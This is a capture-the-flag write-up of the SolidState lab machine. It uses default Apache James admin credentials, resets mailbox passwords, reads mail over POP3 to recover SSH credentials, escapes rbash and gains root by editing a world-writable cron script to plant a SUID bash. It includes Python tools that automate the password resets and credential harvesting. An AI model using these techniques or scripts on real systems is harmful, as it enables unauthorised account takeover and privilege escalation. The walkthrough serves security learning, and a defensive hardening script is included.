Summary

SolidState is an easy Linux box. An unusual port (4555) turned out to run the Apache James Remote Administration Tool 2.3.2, which still accepted its default credentials root:root. Through that console the mail accounts were listed and their passwords reset, which allowed logging in over POP3 on port 110 and reading each user's mail. One email contained plaintext SSH credentials, which gave a (restricted) shell. Privilege escalation was the result of a world-writable, root-owned Python script executed by a cron job: it was modified to run a bash script that planted a SUID copy of bash.


Discovery

Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn 10.129.29.189

PORT    STATE SERVICE
22/tcp  open  ssh
25/tcp  open  smtp
80/tcp  open  http
110/tcp open  pop3
119/tcp open  nntp

Browsing to port 80 showed a static site with nothing of interest (screenshot omitted). A wider Nmap scan, however, found a further port:

PORT     STATE SERVICE VERSION
4555/tcp open  rsip?

Netcat was used to get more information:

jeroen@kali:~$ nc 10.129.29.189 4555
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands

This is the remote administration console of the Apache James mail server, and it accepted the documented default credentials root:root. The following command lists the mail accounts:

listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin

Exploitation

Searchsploit contained a public RCE exploit for this version: https://www.exploit-db.com/exploits/35513. The script uses the same default credentials root:root that were just identified. It creates a mail user whose name is a directory traversal, so that a message sent to that user is written into /etc/bash_completion.d, and the payload then runs the next time someone starts an interactive login shell. In other words it only fires once a user actually logs in, which we cannot force from the outside. Instead, let's use the console to reset the users' passwords and read their mail. Note that this locks the real owners out of their mailboxes, so on a real engagement it should be agreed in advance. The passwords are reset like so:

setpassword thomas password
Password for thomas reset
setpassword john password
Password for john reset
setpassword mindy password
Password for mindy reset
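The console session above is easy to script. The following is an added example, not code from the writeup or from the James project: a small Python client that logs in with the default root:root, parses listusers and resets the passwords of the listed accounts (skipping james and mailadmin, which we do not need to touch), together with a constructed in-process stand-in for the console so the script can be run offline. The stand-in's replies are modelled on the netcat transcript; the "Login failed" wording and the FAKE_USERS list are assumptions. Point JamesConsole at 10.129.29.189:4555 to use it against the box.

```python
import socket
import threading

DEFAULT_CREDS = ("root", "root")  # James 2.3.2 console default, as seen with netcat
FAKE_USERS = ["james", "thomas", "john", "mindy", "mailadmin"]  # constructed, mirrors listusers

class JamesConsole:
    """Line-oriented client for the James Remote Administration console (TCP 4555)."""
    def __init__(self, host, port=4555, timeout=10):
        self.sock = socket.create_connection((host, port), timeout=timeout)
        self.f = self.sock.makefile("rw", encoding="ascii", newline="\n")  # keep CRLF, strip below

    def _send(self, line):
        self.f.write(line + "\n")
        self.f.flush()

    def _readline(self, until=None):
        """Next line with CRLF stripped; with until=, skip lines until one contains it."""
        while True:
            line = self.f.readline()
            if not line:
                raise ConnectionError("console closed the connection")
            line = line.rstrip("\r\n")
            if until is None or until in line:
                return line

    def login(self, user=DEFAULT_CREDS[0], password=DEFAULT_CREDS[1]):
        self._readline(until="Login id:")
        self._send(user)
        self._readline(until="Password:")
        self._send(password)
        return self._readline().startswith("Welcome")

    def listusers(self):
        self._send("listusers")  # reply: 'Existing accounts N' then N lines of 'user: name'
        count = int(self._readline(until="Existing accounts").split()[-1])
        return [self._readline().split("user: ", 1)[1] for _ in range(count)]

    def setpassword(self, user, password):
        self._send(f"setpassword {user} {password}")
        return "reset" in self._readline()  # 'Password for <user> reset'

    def close(self):
        self._send("quit")
        self.sock.close()

def reset_all(console, new_password, skip=("james", "mailadmin")):
    """Reset every mailbox password except those in skip; return the users changed."""
    return [u for u in console.listusers()
            if u not in skip and console.setpassword(u, new_password)]

def start_fake_console():
    """Constructed stand-in that answers like the transcript above, so the demo runs offline."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    def serve():
        conn, _ = srv.accept()
        f = conn.makefile("rw", encoding="ascii", newline="\n")
        def say(text):
            f.write(text + "\r\n")
            f.flush()
        say("JAMES Remote Administration Tool 2.3.2")
        say("Please enter your login and password")
        say("Login id:")
        user = f.readline().strip()
        say("Password:")
        if (user, f.readline().strip()) != DEFAULT_CREDS:
            say(f"Login failed for {user}")  # wording assumed, not from the page
            conn.close()
            return
        say(f"Welcome {user}. HELP for a list of commands")
        while True:
            cmd = f.readline().strip().split()
            if not cmd or cmd[0] == "quit":
                break
            if cmd[0] == "listusers":
                say(f"Existing accounts {len(FAKE_USERS)}")
                for u in FAKE_USERS:
                    say(f"user: {u}")
            elif cmd[0] == "setpassword" and len(cmd) == 3 and cmd[1] in FAKE_USERS:
                say(f"Password for {cmd[1]} reset")
        conn.close()
    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]

def demo():
    """Drive the client against the fake console; returns (all users, users reset)."""
    console = JamesConsole("127.0.0.1", start_fake_console())
    assert console.login(), "default credentials rejected"
    users = console.listusers()
    changed = reset_all(console, "password")
    console.close()
    return users, changed

if __name__ == "__main__":
    print(demo())  # on the box: JamesConsole("10.129.29.189").login(), .listusers(), ...
```

The client reads up to each prompt rather than assuming a fixed number of banner lines, so it also copes with a console that prints extra text before "Login id:". Remember that setpassword is destructive: the real owner of the mailbox cannot log in afterwards.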

Now go back to POP3 on port 110, log in with the new password, list the mailbox and retrieve each message:

telnet 10.129.29.189 110
Trying 10.129.29.189...
Connected to 10.129.29.189.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
user john
+OK
pass password
+OK Welcome john
list
+OK 1 743
1 743
.
retr 1
+OK Message follows
Return-Path: 
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for ;
          Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John, 

Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.

Thank you in advance.

Respectfully,
James

Mindy's mailbox was opened the same way (user mindy / pass password) and her second message retrieved:

retr 2
+OK Message follows
Return-Path: 
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for ;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,


Here are your ssh credentials to access the system. Remember to reset your password after your first login. 
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. 

username: mindy
pass: P@55W0rd1!2@

Mindy's SSH credentials were now known. They worked over SSH, and user.txt could be read.
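Rather than retrieving messages one at a time in telnet, a whole mailbox can be pulled and scanned in a few lines. Below is an added example, not part of the original writeup, using Python's standard poplib and email modules: harvest() logs in, RETRs every message without deleting it and returns each subject plus any credential-looking lines in the body; extract_credentials() does the scanning and is exercised offline on SAMPLE_MAIL, which is constructed from the mindy message above. The CRED_RE pattern and the script's argument order are my choices, not something the box dictates.

```python
import email
import poplib
import re
import sys

# Matches "username: mindy" / "pass: P@55W0rd1!2@" style lines, one per line, case-insensitive.
CRED_RE = re.compile(
    r"^[ \t]*(user(?:name)?|login|pass(?:word)?|pwd)[ \t]*[:=][ \t]*(\S+)[ \t]*$",
    re.IGNORECASE | re.MULTILINE,
)

# Constructed from the mail to mindy shown above (headers trimmed); not a live capture.
SAMPLE_MAIL = (
    "From: mailadmin@localhost\r\n"
    "Subject: Your Access\r\n"
    "\r\n"
    "Dear Mindy,\r\n"
    "\r\n"
    "Here are your ssh credentials to access the system. Remember to reset your password after your first login.\r\n"
    "\r\n"
    "username: mindy\r\n"
    "pass: P@55W0rd1!2@\r\n"
)

def body_text(msg):
    """Plain-text body of a parsed message (text/plain parts joined for multipart), LF line ends."""
    if not msg.is_multipart():
        text = msg.get_payload(decode=True).decode("utf-8", "replace")
    else:
        text = "\n".join(p.get_payload(decode=True).decode("utf-8", "replace")
                         for p in msg.walk() if p.get_content_type() == "text/plain")
    return text.replace("\r\n", "\n")

def extract_credentials(raw_message):
    """Return [(username, password)] pairs found in the body. A password line without a
    preceding username line is paired with None so it is still reported."""
    pairs, user = [], None
    for key, value in CRED_RE.findall(body_text(email.message_from_string(raw_message))):
        if key.lower().startswith(("user", "login")):
            user = value
        else:
            pairs.append((user, value))
            user = None
    return pairs

def harvest(host, user, password, port=110):
    """Log in over POP3, RETR every message (no DELE, so nothing is destroyed) and
    return [(subject, credentials)] per message."""
    pop = poplib.POP3(host, port, timeout=15)
    pop.user(user)
    pop.pass_(password)
    results = []
    for i in range(1, pop.stat()[0] + 1):
        _, lines, _ = pop.retr(i)  # lines are bytes without their CRLF
        raw = b"\r\n".join(lines).decode("utf-8", "replace")
        subject = email.message_from_string(raw).get("Subject", "")
        results.append((subject, extract_credentials(raw)))
    pop.quit()
    return results

if __name__ == "__main__":
    if len(sys.argv) == 4:  # e.g. harvest.py 10.129.29.189 mindy password
        for subject, creds in harvest(*sys.argv[1:]):
            print(f"{subject!r}: {creds}")
    else:
        print(extract_credentials(SAMPLE_MAIL))
```

Run it once per account whose password was reset; because it uses RETR only, the mailbox contents are left in place for the next person (or for the real owner).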


Privilege Escalation

The shell turned out to be a restricted bash (rbash):

mindy@solidstate:~$ cd /tmp
-rbash: cd: restricted

However, the restriction only applies to the login shell. Asking SSH to run an unrestricted bash as the remote command, with --noprofile so the login profile is never sourced, sidesteps it (add -t if you want a proper interactive tty):

ssh mindy@10.129.29.189 "bash --noprofile"

Enumeration scripts were run and linpeas found some interesting writable files:

[+] Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/home/mindy
/opt/tmp.py
/run/lock
/run/user/1001
/run/user/1001/gnupg
/run/user/1001/systemd
/run/user/1001/systemd/transient
/tmp
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/linpeas.sh
/tmp/.Test-unix
/tmp/.X11-unix
/var/tmp

Each of these was checked by hand and /opt/tmp.py stood out. Its permissions are as follows:

ls -la /opt/tmp.py
-rwxrwxrwx 1 root root 105 Aug 22  2017 /opt/tmp.py

It is owned by root but world-writable, so any user can edit it. Let's check out the content:

cat /opt/tmp.py
#!/usr/bin/env python
import os
import sys
try:
    os.system('rm -r /tmp/* ')
except:
    sys.exit()

So it removes everything from /tmp, the kind of housekeeping that is typically run from a root cron job. Let's replace the command with one that executes a bash script of our own:

#!/usr/bin/env python
import os
import sys

try:
     os.system('bash /tmp/root.sh')
except:
     sys.exit()

The following bash script was created in /tmp (safe now, since the replaced tmp.py no longer wipes that directory). It copies bash and sets the SUID bit on the copy, so once the cron job has run it as root the copy starts with root's effective UID:

cat /tmp/root.sh 
cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash

After a few minutes the cron job ran and a new file, /tmp/rootbash, appeared. Running it with -p (which stops bash from dropping the effective UID back to the real one) gives a root shell:

${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ /tmp/rootbash -p
rootbash-4.4# whoami
root
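What made the escalation possible is the combination of a root-owned, world-writable script and a root cron job that runs it. The following is an added example, not from the writeup: the check a practitioner would run for that pattern, plus the fix. world_writable_files() finds regular files with the other-write bit set (root-owned by default), cron_references() greps the readable cron files for a path, and harden() clears the group/other write bits, which is what chmod go-w /opt/tmp.py would have done (only root can apply it to a root-owned file). demo() rehearses the whole thing in a scratch directory with a constructed crontab line; the */3 schedule is invented, since the box's real cron entry is not visible to mindy.

```python
import os
import shutil
import stat
import tempfile

def is_world_writable(path):
    """True for a regular file with the other-write bit set (the last 'w' in -rwxrwxrwx)."""
    st = os.lstat(path)  # lstat: do not follow symlinks; a link target's perms are irrelevant here
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_IWOTH)

def world_writable_files(roots, owner_uid=0):
    """Walk roots and return regular files writable by everyone and owned by owner_uid
    (0 = root, the combination that made /opt/tmp.py exploitable); None disables the owner filter."""
    hits = []
    for root in roots:
        for dirpath, _dirs, names in os.walk(root):
            for name in names:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue  # vanished or unreadable entry
                if (stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_IWOTH
                        and (owner_uid is None or st.st_uid == owner_uid)):
                    hits.append(path)
    return sorted(hits)

def cron_references(target, cron_files=("/etc/crontab",), cron_dirs=("/etc/cron.d",)):
    """(file, line) for every readable, non-comment cron line that mentions target.
    Root's own crontab (/var/spool/cron/crontabs/root) is unreadable to other users, which
    is why on the box the job could only be confirmed by waiting for it to fire."""
    candidates = list(cron_files)
    for d in cron_dirs:
        try:
            candidates += [os.path.join(d, n) for n in sorted(os.listdir(d))]
        except OSError:
            continue
    refs = []
    for f in candidates:
        try:
            with open(f, errors="replace") as fh:
                refs += [(f, line.strip()) for line in fh
                         if target in line and not line.lstrip().startswith("#")]
        except OSError:
            continue
    return refs

def harden(path):
    """The fix the admin needed: drop group/other write, i.e. chmod go-w. True once clean."""
    mode = stat.S_IMODE(os.lstat(path).st_mode)
    os.chmod(path, mode & ~(stat.S_IWGRP | stat.S_IWOTH))
    return not is_world_writable(path)

def demo():
    """Offline rehearsal in a scratch directory: a mode-0777 script plus a constructed
    crontab line that runs it (the */3 schedule is invented). Returns what each check saw."""
    scratch = tempfile.mkdtemp()
    script = os.path.join(scratch, "tmp.py")
    with open(script, "w") as fh:
        fh.write("#!/usr/bin/env python\nimport os\nos.system('rm -r /tmp/* ')\n")
    os.chmod(script, 0o777)
    crontab = os.path.join(scratch, "crontab")
    with open(crontab, "w") as fh:
        fh.write("# constructed, not the box's real crontab\n*/3 * * * * root python " + script + "\n")
    os.chmod(crontab, 0o644)
    result = {
        "script": script,
        "crontab": crontab,
        "before": world_writable_files([scratch], owner_uid=os.getuid()),
        "cron": cron_references(script, cron_files=(crontab,), cron_dirs=()),
        "hardened": harden(script),
        "after": world_writable_files([scratch], owner_uid=None),
    }
    shutil.rmtree(scratch)
    return result

if __name__ == "__main__":
    print(demo())
    for path in world_writable_files(["/opt", "/etc", "/usr/local/bin"]):  # root-owned, o+w
        print("candidate:", path, cron_references(path))
```

On the box, running world_writable_files(["/opt"]) as mindy reports /opt/tmp.py straight away; what it cannot tell you is the schedule, which is why the writeup had to wait for the job.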

Conclusion

This was a really fun box; I enjoyed the process and learned how to enumerate POP3 for emails. It was an easy box and the path was very straightforward. I hope you enjoyed this writeup!